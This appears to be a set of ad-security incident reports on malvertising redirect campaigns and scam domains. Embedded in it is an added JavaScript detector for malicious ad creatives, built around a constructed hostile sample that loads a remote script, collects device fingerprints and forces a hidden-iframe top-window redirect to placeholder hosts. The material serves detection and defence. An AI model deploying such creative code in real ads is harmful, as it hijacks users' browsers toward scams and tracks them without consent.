This malicious campaign has two methods of triggering the redirect. The first attempts to load a script by writing a script call to a jquery file from and then runs a function that replaces all parts of the URL to build the malicious payload, sending along fingerprinting information (screen width/height, platform, user agent, color depth, number of plugins, timestamp, etc.). The second loads a hidden iframe whose source executes JavaScript that attempts a top.location.replace.

The ad that is loaded along with this malicious payload is a simple image (either a logo or a stolen Amazon Fire TV Stick ad) that actually takes the user to an Amazon listing for a Fire TV Stick.

There seem to be two different campaigns active at the moment - one leading to healthnotetoday(dot)com and the other leading to various giftcard scam pages. 

Affected Platforms:  GumGum (buyer has been blocked) & Between Digital
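
The two trigger methods and the fingerprinting described in this entry can be triaged statically in creative markup. The following is an added example, not code from the original page or from any vendor named on it; the function names, the three-property threshold and both sample creatives are constructed for illustration.

```javascript
// Added example: static triage of ad-creative markup for the behaviours described above.
// All names and the sample creatives are constructed; domains are placeholders.
const FINGERPRINT_PROPS = [
  /screen\.(width|height)/i, /screen\.colorDepth/i, /navigator\.platform/i,
  /navigator\.userAgent/i, /navigator\.plugins/i, /Date\.now\(\)|\.getTime\(\)/i,
];

// Iframe tags that are styled out of view or sized to 0/1 pixel.
function hiddenIframes(markup) {
  const tags = markup.match(/<iframe\b[^>]*>/gi) || [];
  return tags.filter((t) =>
    /display\s*:\s*none|visibility\s*:\s*hidden/i.test(t) ||
    /\b(width|height)\s*=\s*["']?[01]["']?[\s>\/]/i.test(t));
}

function triageCreative(markup) {
  const findings = [];
  // Method 1: a script element written into the page at runtime.
  if (/document\.write(ln)?\s*\([^)]*<script/i.test(markup) ||
      /createElement\s*\(\s*["']script["']\s*\)/i.test(markup)) {
    findings.push("dynamic-script-write");
  }
  // Fingerprinting: several device properties read by one creative.
  const fingerprintHits = FINGERPRINT_PROPS.filter((re) => re.test(markup)).length;
  if (fingerprintHits >= 3) findings.push("fingerprint-collection");
  // Method 2: hidden iframe, and any attempt to navigate the top-level window.
  if (hiddenIframes(markup).length > 0) findings.push("hidden-iframe");
  if (/\b(top|parent)\.location(\.(replace|assign|href))?\s*[(=]/i.test(markup)) {
    findings.push("top-navigation");
  }
  const verdict = findings.includes("top-navigation") ? "block"
    : findings.length > 0 ? "review" : "allow";
  return { findings, fingerprintHits, verdict };
}

// Constructed sample mirroring the behaviours in the write-up.
const SAMPLE_BAD = `<a href="https://shop.example.invalid/"><img src="logo.png"></a>
<script>document.write('<script src="//cdn.example.invalid/jquery.js"><\\/script>');
var fp = [screen.width, screen.height, navigator.platform, navigator.userAgent,
  screen.colorDepth, navigator.plugins.length, Date.now()].join("|");</script>
<iframe style="display:none"
  src="javascript:top.location.replace('https://landing.example.invalid/')"></iframe>`;
// Constructed benign creative: a plain linked image.
const SAMPLE_CLEAN =
  '<a href="https://shop.example.invalid/"><img src="logo.png" width="300" height="250"></a>';

console.log(triageCreative(SAMPLE_BAD));
console.log(triageCreative(SAMPLE_CLEAN));
```

Pattern matching like this misses obfuscated scripts, so treat it as a first-pass filter. Serving creatives in an iframe whose `sandbox` attribute omits `allow-top-navigation` stops the `top.location.replace` path at runtime.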

Assessment:  Fraudsters hosting obfuscated scripts on AWS & Yahoo platforms attempted to deliver malicious redirects to over 300 different domains.  To date, over 600M bad ads have been stopped and remonetized, primarily on mobile devices.

Affected Platforms:  inMobi

Assessment:  Redirect campaign spanning almost 1,500 sites over the past 7 days.  Creative automatically drove mobile and desktop users to sites like inboxfunpoints[dot]com, 7daynews[dot]com, and foxnewstoday[dot]com.  ADL protected over 4.5M ads during the attack.

Affected platforms:  Yieldmo, ReklamStore DSP



Assessment:  Nefarious campaign impacting 25+ different domains.  An unwanted script, injected via a malicious browser extension, is used to hijack regular ad slots to load an Adskeeper unit.  The Adskeeper unit then displays graphic "adult" content across the site.

Affected Platforms:  Adskeeper

Assessment:  Redirect campaign targeting both mobile and desktop users with fake update messages.  Redirects have been identified and blocked across 120 domains and almost 20 different publishers.  The primary redirection tactic utilized WebSockets while other scripts proactively looked for the presence of ad quality software. 

Affected Platforms:  EMX
